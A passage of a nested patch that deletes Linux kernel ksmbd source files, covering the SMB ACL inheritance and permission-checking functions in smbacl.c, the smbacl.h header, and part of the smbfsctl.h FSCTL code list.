+-static void smb_set_ace(struct smb_ace *ace, const struct smb_sid *sid, u8 type,
+-			u8 flags, __le32 access_req)
+-{
+-	ace->type = type;
+-	ace->flags = flags;
+-	ace->access_req = access_req;
+-	smb_copy_sid(&ace->sid, sid);
+-	ace->size = cpu_to_le16(1 + 1 + 2 + 4 + 1 + 1 + 6 + (sid->num_subauth * 4));
+-}
+-
+-int smb_inherit_dacl(struct ksmbd_conn *conn,
+-		     const struct path *path,
+-		     unsigned int uid, unsigned int gid)
+-{
+-	const struct smb_sid *psid, *creator = NULL;
+-	struct smb_ace *parent_aces, *aces;
+-	struct smb_acl *parent_pdacl;
+-	struct smb_ntsd *parent_pntsd = NULL;
+-	struct smb_sid owner_sid, group_sid;
+-	struct dentry *parent = path->dentry->d_parent;
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	int inherited_flags = 0, flags = 0, i, ace_cnt = 0, nt_size = 0, pdacl_size;
+-	int rc = 0, num_aces, dacloffset, pntsd_type, pntsd_size, acl_len, aces_size;
+-	char *aces_base;
+-	bool is_dir = S_ISDIR(d_inode(path->dentry)->i_mode);
+-
+-	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
+-					    parent, &parent_pntsd);
+-	if (pntsd_size <= 0)
+-		return -ENOENT;
+-	dacloffset = le32_to_cpu(parent_pntsd->dacloffset);
+-	if (!dacloffset || (dacloffset + sizeof(struct smb_acl) > pntsd_size)) {
+-		rc = -EINVAL;
+-		goto free_parent_pntsd;
+-	}
+-
+-	parent_pdacl = (struct smb_acl *)((char *)parent_pntsd + dacloffset);
+-	acl_len = pntsd_size - dacloffset;
+-	num_aces = le32_to_cpu(parent_pdacl->num_aces);
+-	pntsd_type = le16_to_cpu(parent_pntsd->type);
+-	pdacl_size = le16_to_cpu(parent_pdacl->size);
+-
+-	if (pdacl_size > acl_len || pdacl_size < sizeof(struct smb_acl)) {
+-		rc = -EINVAL;
+-		goto free_parent_pntsd;
+-	}
+-
+-	aces_base = kmalloc(sizeof(struct smb_ace) * num_aces * 2, GFP_KERNEL);
+-	if (!aces_base) {
+-		rc = -ENOMEM;
+-		goto free_parent_pntsd;
+-	}
+-
+-	aces = (struct smb_ace *)aces_base;
+-	parent_aces = (struct smb_ace *)((char *)parent_pdacl +
+-			sizeof(struct smb_acl));
+-	aces_size = acl_len - sizeof(struct smb_acl);
+-
+-	if (pntsd_type & DACL_AUTO_INHERITED)
+-		inherited_flags = INHERITED_ACE;
+-
+-	for (i = 0; i < num_aces; i++) {
+-		int pace_size;
+-
+-		if (offsetof(struct smb_ace, access_req) > aces_size)
+-			break;
+-
+-		pace_size = le16_to_cpu(parent_aces->size);
+-		if (pace_size > aces_size)
+-			break;
+-
+-		aces_size -= pace_size;
+-
+-		flags = parent_aces->flags;
+-		if (!smb_inherit_flags(flags, is_dir))
+-			goto pass;
+-		if (is_dir) {
+-			flags &= ~(INHERIT_ONLY_ACE | INHERITED_ACE);
+-			if (!(flags & CONTAINER_INHERIT_ACE))
+-				flags |= INHERIT_ONLY_ACE;
+-			if (flags & NO_PROPAGATE_INHERIT_ACE)
+-				flags = 0;
+-		} else {
+-			flags = 0;
+-		}
+-
+-		if (!compare_sids(&creator_owner, &parent_aces->sid)) {
+-			creator = &creator_owner;
+-			id_to_sid(uid, SIDOWNER, &owner_sid);
+-			psid = &owner_sid;
+-		} else if (!compare_sids(&creator_group, &parent_aces->sid)) {
+-			creator = &creator_group;
+-			id_to_sid(gid, SIDUNIX_GROUP, &group_sid);
+-			psid = &group_sid;
+-		} else {
+-			creator = NULL;
+-			psid = &parent_aces->sid;
+-		}
+-
+-		if (is_dir && creator && flags & CONTAINER_INHERIT_ACE) {
+-			smb_set_ace(aces, psid, parent_aces->type, inherited_flags,
+-				    parent_aces->access_req);
+-			nt_size += le16_to_cpu(aces->size);
+-			ace_cnt++;
+-			aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
+-			flags |= INHERIT_ONLY_ACE;
+-			psid = creator;
+-		} else if (is_dir && !(parent_aces->flags & NO_PROPAGATE_INHERIT_ACE)) {
+-			psid = &parent_aces->sid;
+-		}
+-
+-		smb_set_ace(aces, psid, parent_aces->type, flags | inherited_flags,
+-			    parent_aces->access_req);
+-		nt_size += le16_to_cpu(aces->size);
+-		aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
+-		ace_cnt++;
+-pass:
+-		parent_aces = (struct smb_ace *)((char *)parent_aces + pace_size);
+-	}
+-
+-	if (nt_size > 0) {
+-		struct smb_ntsd *pntsd;
+-		struct smb_acl *pdacl;
+-		struct smb_sid *powner_sid = NULL, *pgroup_sid = NULL;
+-		int powner_sid_size = 0, pgroup_sid_size = 0, pntsd_size;
+-
+-		if (parent_pntsd->osidoffset) {
+-			powner_sid = (struct smb_sid *)((char *)parent_pntsd +
+-					le32_to_cpu(parent_pntsd->osidoffset));
+-			powner_sid_size = 1 + 1 + 6 + (powner_sid->num_subauth * 4);
+-		}
+-		if (parent_pntsd->gsidoffset) {
+-			pgroup_sid = (struct smb_sid *)((char *)parent_pntsd +
+-					le32_to_cpu(parent_pntsd->gsidoffset));
+-			pgroup_sid_size = 1 + 1 + 6 + (pgroup_sid->num_subauth * 4);
+-		}
+-
+-		pntsd = kzalloc(sizeof(struct smb_ntsd) + powner_sid_size +
+-				pgroup_sid_size + sizeof(struct smb_acl) +
+-				nt_size, GFP_KERNEL);
+-		if (!pntsd) {
+-			rc = -ENOMEM;
+-			goto free_aces_base;
+-		}
+-
+-		pntsd->revision = cpu_to_le16(1);
+-		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PRESENT);
+-		if (le16_to_cpu(parent_pntsd->type) & DACL_AUTO_INHERITED)
+-			pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
+-		pntsd_size = sizeof(struct smb_ntsd);
+-		pntsd->osidoffset = parent_pntsd->osidoffset;
+-		pntsd->gsidoffset = parent_pntsd->gsidoffset;
+-		pntsd->dacloffset = parent_pntsd->dacloffset;
+-
+-		if (pntsd->osidoffset) {
+-			struct smb_sid *owner_sid = (struct smb_sid *)((char *)pntsd +
+-					le32_to_cpu(pntsd->osidoffset));
+-			memcpy(owner_sid, powner_sid, powner_sid_size);
+-			pntsd_size += powner_sid_size;
+-		}
+-
+-		if (pntsd->gsidoffset) {
+-			struct smb_sid *group_sid = (struct smb_sid *)((char *)pntsd +
+-					le32_to_cpu(pntsd->gsidoffset));
+-			memcpy(group_sid, pgroup_sid, pgroup_sid_size);
+-			pntsd_size += pgroup_sid_size;
+-		}
+-
+-		if (pntsd->dacloffset) {
+-			struct smb_ace *pace;
+-
+-			pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
+-			pdacl->revision = cpu_to_le16(2);
+-			pdacl->size = cpu_to_le16(sizeof(struct smb_acl) + nt_size);
+-			pdacl->num_aces = cpu_to_le32(ace_cnt);
+-			pace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
+-			memcpy(pace, aces_base, nt_size);
+-			pntsd_size += sizeof(struct smb_acl) + nt_size;
+-		}
+-
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, pntsd_size);
+-		kfree(pntsd);
+-	}
+-
+-free_aces_base:
+-	kfree(aces_base);
+-free_parent_pntsd:
+-	kfree(parent_pntsd);
+-	return rc;
+-}
+-
+-bool smb_inherit_flags(int flags, bool is_dir)
+-{
+-	if (!is_dir)
+-		return (flags & OBJECT_INHERIT_ACE) != 0;
+-
+-	if (flags & OBJECT_INHERIT_ACE && !(flags & NO_PROPAGATE_INHERIT_ACE))
+-		return true;
+-
+-	if (flags & CONTAINER_INHERIT_ACE)
+-		return true;
+-	return false;
+-}
+-
+-int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+-			__le32 *pdaccess, int uid)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	struct smb_ntsd *pntsd = NULL;
+-	struct smb_acl *pdacl;
+-	struct posix_acl *posix_acls;
+-	int rc = 0, pntsd_size, acl_size, aces_size, pdacl_size, dacl_offset;
+-	struct smb_sid sid;
+-	int granted = le32_to_cpu(*pdaccess & ~FILE_MAXIMAL_ACCESS_LE);
+-	struct smb_ace *ace;
+-	int i, found = 0;
+-	unsigned int access_bits = 0;
+-	struct smb_ace *others_ace = NULL;
+-	struct posix_acl_entry *pa_entry;
+-	unsigned int sid_type = SIDOWNER;
+-	unsigned short ace_size;
+-
+-	ksmbd_debug(SMB, "check permission using windows acl\n");
+-	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
+-					    path->dentry, &pntsd);
+-	if (pntsd_size <= 0 || !pntsd)
+-		goto err_out;
+-
+-	dacl_offset = le32_to_cpu(pntsd->dacloffset);
+-	if (!dacl_offset ||
+-	    (dacl_offset + sizeof(struct smb_acl) > pntsd_size))
+-		goto err_out;
+-
+-	pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
+-	acl_size = pntsd_size - dacl_offset;
+-	pdacl_size = le16_to_cpu(pdacl->size);
+-
+-	if (pdacl_size > acl_size || pdacl_size < sizeof(struct smb_acl))
+-		goto err_out;
+-
+-	if (!pdacl->num_aces) {
+-		if (!(pdacl_size - sizeof(struct smb_acl)) &&
+-		    *pdaccess & ~(FILE_READ_CONTROL_LE | FILE_WRITE_DAC_LE)) {
+-			rc = -EACCES;
+-			goto err_out;
+-		}
+-		goto err_out;
+-	}
+-
+-	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE) {
+-		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
+-			DELETE;
+-
+-		ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
+-		aces_size = acl_size - sizeof(struct smb_acl);
+-		for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
+-			if (offsetof(struct smb_ace, access_req) > aces_size)
+-				break;
+-			ace_size = le16_to_cpu(ace->size);
+-			if (ace_size > aces_size)
+-				break;
+-			aces_size -= ace_size;
+-			granted |= le32_to_cpu(ace->access_req);
+-			ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
+-		}
+-
+-		if (!pdacl->num_aces)
+-			granted = GENERIC_ALL_FLAGS;
+-	}
+-
+-	if (!uid)
+-		sid_type = SIDUNIX_USER;
+-	id_to_sid(uid, sid_type, &sid);
+-
+-	ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
+-	aces_size = acl_size - sizeof(struct smb_acl);
+-	for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
+-		if (offsetof(struct smb_ace, access_req) > aces_size)
+-			break;
+-		ace_size = le16_to_cpu(ace->size);
+-		if (ace_size > aces_size)
+-			break;
+-		aces_size -= ace_size;
+-
+-		if (!compare_sids(&sid, &ace->sid) ||
+-		    !compare_sids(&sid_unix_NFS_mode, &ace->sid)) {
+-			found = 1;
+-			break;
+-		}
+-		if (!compare_sids(&sid_everyone, &ace->sid))
+-			others_ace = ace;
+-
+-		ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
+-	}
+-
+-	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE && found) {
+-		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
+-			DELETE;
+-
+-		granted |= le32_to_cpu(ace->access_req);
+-
+-		if (!pdacl->num_aces)
+-			granted = GENERIC_ALL_FLAGS;
+-	}
+-
+-	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-		posix_acls = get_acl(d_inode(path->dentry), ACL_TYPE_ACCESS);
+-		if (posix_acls && !found) {
+-			unsigned int id = -1;
+-
+-			pa_entry = posix_acls->a_entries;
+-			for (i = 0; i < posix_acls->a_count; i++, pa_entry++) {
+-				if (pa_entry->e_tag == ACL_USER)
+-					id = posix_acl_uid_translate(user_ns, pa_entry);
+-				else if (pa_entry->e_tag == ACL_GROUP)
+-					id = posix_acl_gid_translate(user_ns, pa_entry);
+-				else
+-					continue;
+-
+-				if (id == uid) {
+-					mode_to_access_flags(pa_entry->e_perm,
+-							     0777,
+-							     &access_bits);
+-					if (!access_bits)
+-						access_bits =
+-							SET_MINIMUM_RIGHTS;
+-					posix_acl_release(posix_acls);
+-					goto check_access_bits;
+-				}
+-			}
+-		}
+-		if (posix_acls)
+-			posix_acl_release(posix_acls);
+-	}
+-
+-	if (!found) {
+-		if (others_ace) {
+-			ace = others_ace;
+-		} else {
+-			ksmbd_debug(SMB, "Can't find corresponding sid\n");
+-			rc = -EACCES;
+-			goto err_out;
+-		}
+-	}
+-
+-	switch (ace->type) {
+-	case ACCESS_ALLOWED_ACE_TYPE:
+-		access_bits = le32_to_cpu(ace->access_req);
+-		break;
+-	case ACCESS_DENIED_ACE_TYPE:
+-	case ACCESS_DENIED_CALLBACK_ACE_TYPE:
+-		access_bits = le32_to_cpu(~ace->access_req);
+-		break;
+-	}
+-
+-check_access_bits:
+-	if (granted &
+-	    ~(access_bits | FILE_READ_ATTRIBUTES | READ_CONTROL | WRITE_DAC | DELETE)) {
+-		ksmbd_debug(SMB, "Access denied with winACL, granted : %x, access_req : %x\n",
+-			    granted, le32_to_cpu(ace->access_req));
+-		rc = -EACCES;
+-		goto err_out;
+-	}
+-
+-	*pdaccess = cpu_to_le32(granted);
+-err_out:
+-	kfree(pntsd);
+-	return rc;
+-}
+-
+-int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+-		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check)
+-{
+-	int rc;
+-	struct smb_fattr fattr = {{0}};
+-	struct inode *inode = d_inode(path->dentry);
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	struct iattr newattrs;
+-
+-	fattr.cf_uid = INVALID_UID;
+-	fattr.cf_gid = INVALID_GID;
+-	fattr.cf_mode = inode->i_mode;
+-
+-	rc = parse_sec_desc(user_ns, pntsd, ntsd_len, &fattr);
+-	if (rc)
+-		goto out;
+-
+-	newattrs.ia_valid = ATTR_CTIME;
+-	if (!uid_eq(fattr.cf_uid, INVALID_UID)) {
+-		newattrs.ia_valid |= ATTR_UID;
+-		newattrs.ia_uid = fattr.cf_uid;
+-	}
+-	if (!gid_eq(fattr.cf_gid, INVALID_GID)) {
+-		newattrs.ia_valid |= ATTR_GID;
+-		newattrs.ia_gid = fattr.cf_gid;
+-	}
+-	newattrs.ia_valid |= ATTR_MODE;
+-	newattrs.ia_mode = (inode->i_mode & ~0777) | (fattr.cf_mode & 0777);
+-
+-	ksmbd_vfs_remove_acl_xattrs(user_ns, path->dentry);
+-	/* Update posix acls */
+-	if (IS_ENABLED(CONFIG_FS_POSIX_ACL) && fattr.cf_dacls) {
+-		rc = set_posix_acl(user_ns, inode,
+-				   ACL_TYPE_ACCESS, fattr.cf_acls);
+-		if (rc < 0)
+-			ksmbd_debug(SMB,
+-				    "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+-				    rc);
+-		if (S_ISDIR(inode->i_mode) && fattr.cf_dacls) {
+-			rc = set_posix_acl(user_ns, inode,
+-					   ACL_TYPE_DEFAULT, fattr.cf_dacls);
+-			if (rc)
+-				ksmbd_debug(SMB,
+-					    "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+-					    rc);
+-		}
+-	}
+-
+-	inode_lock(inode);
+-	rc = notify_change(user_ns, path->dentry, &newattrs, NULL);
+-	inode_unlock(inode);
+-	if (rc)
+-		goto out;
+-
+-	/* Check it only calling from SD BUFFER context */
+-	if (type_check && !(le16_to_cpu(pntsd->type) & DACL_PRESENT))
+-		goto out;
+-
+-	if (test_share_config_flag(tcon->share_conf, KSMBD_SHARE_FLAG_ACL_XATTR)) {
+-		/* Update WinACL in xattr */
+-		ksmbd_vfs_remove_sd_xattrs(user_ns, path->dentry);
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, ntsd_len);
+-	}
+-
+-out:
+-	posix_acl_release(fattr.cf_acls);
+-	posix_acl_release(fattr.cf_dacls);
+-	mark_inode_dirty(inode);
+-	return rc;
+-}
+-
+-void ksmbd_init_domain(u32 *sub_auth)
+-{
+-	int i;
+-
+-	memcpy(&server_conf.domain_sid, &domain, sizeof(struct smb_sid));
+-	for (i = 0; i < 3; ++i)
+-		server_conf.domain_sid.sub_auth[i + 1] = cpu_to_le32(sub_auth[i]);
+-}
+diff --git a/fs/ksmbd/smbacl.h b/fs/ksmbd/smbacl.h
+deleted file mode 100644
+index 618f2e0236b31..0000000000000
+--- a/fs/ksmbd/smbacl.h
++++ /dev/null
+@@ -1,238 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   Copyright (c) International Business Machines  Corp., 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *   Modified by Namjae Jeon (linkinjeon@kernel.org)
+- */
+-
+-#ifndef _SMBACL_H
+-#define _SMBACL_H
+-
+-#include <linux/fs.h>
+-#include <linux/namei.h>
+-#include <linux/posix_acl.h>
+-#include <linux/mnt_idmapping.h>
+-
+-#include "mgmt/tree_connect.h"
+-
+-#define NUM_AUTHS (6)	/* number of authority fields */
+-#define SID_MAX_SUB_AUTHORITIES (15) /* max number of sub authority fields */
+-
+-/*
+- * ACE types - see MS-DTYP 2.4.4.1
+- */
+-enum {
+-	ACCESS_ALLOWED,
+-	ACCESS_DENIED,
+-};
+-
+-/*
+- * Security ID types
+- */
+-enum {
+-	SIDOWNER = 1,
+-	SIDGROUP,
+-	SIDCREATOR_OWNER,
+-	SIDCREATOR_GROUP,
+-	SIDUNIX_USER,
+-	SIDUNIX_GROUP,
+-	SIDNFS_USER,
+-	SIDNFS_GROUP,
+-	SIDNFS_MODE,
+-};
+-
+-/* Revision for ACLs */
+-#define SD_REVISION	1
+-
+-/* Control flags for Security Descriptor */
+-#define OWNER_DEFAULTED		0x0001
+-#define GROUP_DEFAULTED		0x0002
+-#define DACL_PRESENT		0x0004
+-#define DACL_DEFAULTED		0x0008
+-#define SACL_PRESENT		0x0010
+-#define SACL_DEFAULTED		0x0020
+-#define DACL_TRUSTED		0x0040
+-#define SERVER_SECURITY		0x0080
+-#define DACL_AUTO_INHERIT_REQ	0x0100
+-#define SACL_AUTO_INHERIT_REQ	0x0200
+-#define DACL_AUTO_INHERITED	0x0400
+-#define SACL_AUTO_INHERITED	0x0800
+-#define DACL_PROTECTED		0x1000
+-#define SACL_PROTECTED		0x2000
+-#define RM_CONTROL_VALID	0x4000
+-#define SELF_RELATIVE		0x8000
+-
+-/* ACE types - see MS-DTYP 2.4.4.1 */
+-#define ACCESS_ALLOWED_ACE_TYPE 0x00
+-#define ACCESS_DENIED_ACE_TYPE  0x01
+-#define SYSTEM_AUDIT_ACE_TYPE   0x02
+-#define SYSTEM_ALARM_ACE_TYPE   0x03
+-#define ACCESS_ALLOWED_COMPOUND_ACE_TYPE 0x04
+-#define ACCESS_ALLOWED_OBJECT_ACE_TYPE  0x05
+-#define ACCESS_DENIED_OBJECT_ACE_TYPE   0x06
+-#define SYSTEM_AUDIT_OBJECT_ACE_TYPE    0x07
+-#define SYSTEM_ALARM_OBJECT_ACE_TYPE    0x08
+-#define ACCESS_ALLOWED_CALLBACK_ACE_TYPE 0x09
+-#define ACCESS_DENIED_CALLBACK_ACE_TYPE 0x0A
+-#define ACCESS_ALLOWED_CALLBACK_OBJECT_ACE_TYPE 0x0B
+-#define ACCESS_DENIED_CALLBACK_OBJECT_ACE_TYPE  0x0C
+-#define SYSTEM_AUDIT_CALLBACK_ACE_TYPE  0x0D
+-#define SYSTEM_ALARM_CALLBACK_ACE_TYPE  0x0E /* Reserved */
+-#define SYSTEM_AUDIT_CALLBACK_OBJECT_ACE_TYPE 0x0F
+-#define SYSTEM_ALARM_CALLBACK_OBJECT_ACE_TYPE 0x10 /* reserved */
+-#define SYSTEM_MANDATORY_LABEL_ACE_TYPE 0x11
+-#define SYSTEM_RESOURCE_ATTRIBUTE_ACE_TYPE 0x12
+-#define SYSTEM_SCOPED_POLICY_ID_ACE_TYPE 0x13
+-
+-/* ACE flags */
+-#define OBJECT_INHERIT_ACE		0x01
+-#define CONTAINER_INHERIT_ACE		0x02
+-#define NO_PROPAGATE_INHERIT_ACE	0x04
+-#define INHERIT_ONLY_ACE		0x08
+-#define INHERITED_ACE			0x10
+-#define SUCCESSFUL_ACCESS_ACE_FLAG	0x40
+-#define FAILED_ACCESS_ACE_FLAG		0x80
+-
+-/*
+- * Maximum size of a string representation of a SID:
+- *
+- * The fields are unsigned values in decimal. So:
+- *
+- * u8:  max 3 bytes in decimal
+- * u32: max 10 bytes in decimal
+- *
+- * "S-" + 3 bytes for version field + 15 for authority field + NULL terminator
+- *
+- * For authority field, max is when all 6 values are non-zero and it must be
+- * represented in hex. So "-0x" + 12 hex digits.
+- *
+- * Add 11 bytes for each subauthority field (10 bytes each + 1 for '-')
+- */
+-#define SID_STRING_BASE_SIZE (2 + 3 + 15 + 1)
+-#define SID_STRING_SUBAUTH_SIZE (11) /* size of a single subauth string */
+-
+-#define DOMAIN_USER_RID_LE	cpu_to_le32(513)
+-
+-struct ksmbd_conn;
+-
+-struct smb_ntsd {
+-	__le16 revision; /* revision level */
+-	__le16 type;
+-	__le32 osidoffset;
+-	__le32 gsidoffset;
+-	__le32 sacloffset;
+-	__le32 dacloffset;
+-} __packed;
+-
+-struct smb_sid {
+-	__u8 revision; /* revision level */
+-	__u8 num_subauth;
+-	__u8 authority[NUM_AUTHS];
+-	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
+-} __packed;
+-
+-/* size of a struct cifs_sid, sans sub_auth array */
+-#define CIFS_SID_BASE_SIZE (1 + 1 + NUM_AUTHS)
+-
+-struct smb_acl {
+-	__le16 revision; /* revision level */
+-	__le16 size;
+-	__le32 num_aces;
+-} __packed;
+-
+-struct smb_ace {
+-	__u8 type;
+-	__u8 flags;
+-	__le16 size;
+-	__le32 access_req;
+-	struct smb_sid sid; /* ie UUID of user or group who gets these perms */
+-} __packed;
+-
+-struct smb_fattr {
+-	kuid_t	cf_uid;
+-	kgid_t	cf_gid;
+-	umode_t	cf_mode;
+-	__le32 daccess;
+-	struct posix_acl *cf_acls;
+-	struct posix_acl *cf_dacls;
+-};
+-
+-struct posix_ace_state {
+-	u32 allow;
+-	u32 deny;
+-};
+-
+-struct posix_user_ace_state {
+-	union {
+-		kuid_t uid;
+-		kgid_t gid;
+-	};
+-	struct posix_ace_state perms;
+-};
+-
+-struct posix_ace_state_array {
+-	int n;
+-	struct posix_user_ace_state aces[];
+-};
+-
+-/*
+- * while processing the nfsv4 ace, this maintains the partial permissions
+- * calculated so far:
+- */
+-
+-struct posix_acl_state {
+-	struct posix_ace_state owner;
+-	struct posix_ace_state group;
+-	struct posix_ace_state other;
+-	struct posix_ace_state everyone;
+-	struct posix_ace_state mask; /* deny unused in this case */
+-	struct posix_ace_state_array *users;
+-	struct posix_ace_state_array *groups;
+-};
+-
+-int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
+-		   int acl_len, struct smb_fattr *fattr);
+-int build_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
+-		   struct smb_ntsd *ppntsd, int ppntsd_size, int addition_info,
+-		   __u32 *secdesclen, struct smb_fattr *fattr);
+-int init_acl_state(struct posix_acl_state *state, int cnt);
+-void free_acl_state(struct posix_acl_state *state);
+-void posix_state_to_acl(struct posix_acl_state *state,
+-			struct posix_acl_entry *pace);
+-int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid);
+-bool smb_inherit_flags(int flags, bool is_dir);
+-int smb_inherit_dacl(struct ksmbd_conn *conn, const struct path *path,
+-		     unsigned int uid, unsigned int gid);
+-int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+-			__le32 *pdaccess, int uid);
+-int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+-		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check);
+-void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid);
+-void ksmbd_init_domain(u32 *sub_auth);
+-
+-static inline uid_t posix_acl_uid_translate(struct user_namespace *mnt_userns,
+-					    struct posix_acl_entry *pace)
+-{
+-	vfsuid_t vfsuid;
+-
+-	/* If this is an idmapped mount, apply the idmapping. */
+-	vfsuid = make_vfsuid(mnt_userns, &init_user_ns, pace->e_uid);
+-
+-	/* Translate the kuid into a userspace id ksmbd would see. */
+-	return from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid));
+-}
+-
+-static inline gid_t posix_acl_gid_translate(struct user_namespace *mnt_userns,
+-					    struct posix_acl_entry *pace)
+-{
+-	vfsgid_t vfsgid;
+-
+-	/* If this is an idmapped mount, apply the idmapping. */
+-	vfsgid = make_vfsgid(mnt_userns, &init_user_ns, pace->e_gid);
+-
+-	/* Translate the kgid into a userspace id ksmbd would see. */
+-	return from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid));
+-}
+-
+-#endif /* _SMBACL_H */
+diff --git a/fs/ksmbd/smbfsctl.h b/fs/ksmbd/smbfsctl.h
+deleted file mode 100644
+index b98418aae20cd..0000000000000
+--- a/fs/ksmbd/smbfsctl.h
++++ /dev/null
+@@ -1,91 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   fs/cifs/smbfsctl.h: SMB, CIFS, SMB2 FSCTL definitions
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- */
+-
+-/* IOCTL information */
+-/*
+- * List of ioctl/fsctl function codes that are or could be useful in the
+- * future to remote clients like cifs or SMB2 client.  There is probably
+- * a slightly larger set of fsctls that NTFS local filesystem could handle,
+- * including the seven below that we do not have struct definitions for.
+- * Even with protocol definitions for most of these now available, we still
+- * need to do some experimentation to identify which are practical to do
+- * remotely.  Some of the following, such as the encryption/compression ones
+- * could be invoked from tools via a specialized hook into the VFS rather
+- * than via the standard vfs entry points
+- */
+-
+-#ifndef __KSMBD_SMBFSCTL_H
+-#define __KSMBD_SMBFSCTL_H
+-
+-#define FSCTL_DFS_GET_REFERRALS      0x00060194
+-#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
+-#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
+-#define FSCTL_LOCK_VOLUME            0x00090018
+-#define FSCTL_UNLOCK_VOLUME          0x0009001C
+-#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
+-#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
+-#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
+-#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
+-/* Verify the next FSCTL number, we had it as 0x00090090 before */
+-#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
+-#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
+-#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
+-#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
+-#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
+-#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
+-#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
+-#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
+-#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
+-#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
+-#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
+-#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
+-#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
+-#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
+-#define FSCTL_SET_ZERO_DATA          0x000980C8 /* BB add struct */
+-#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
+-#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
+-#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
+-#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
+-#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
+-#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
+-#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
+-#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
+-#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
+-#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
+-#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
+-#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF /* BB add struct */
+-#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
+-#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
+-#define FSCTL_SIS_LINK_FILES         0x0009C104
+-#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
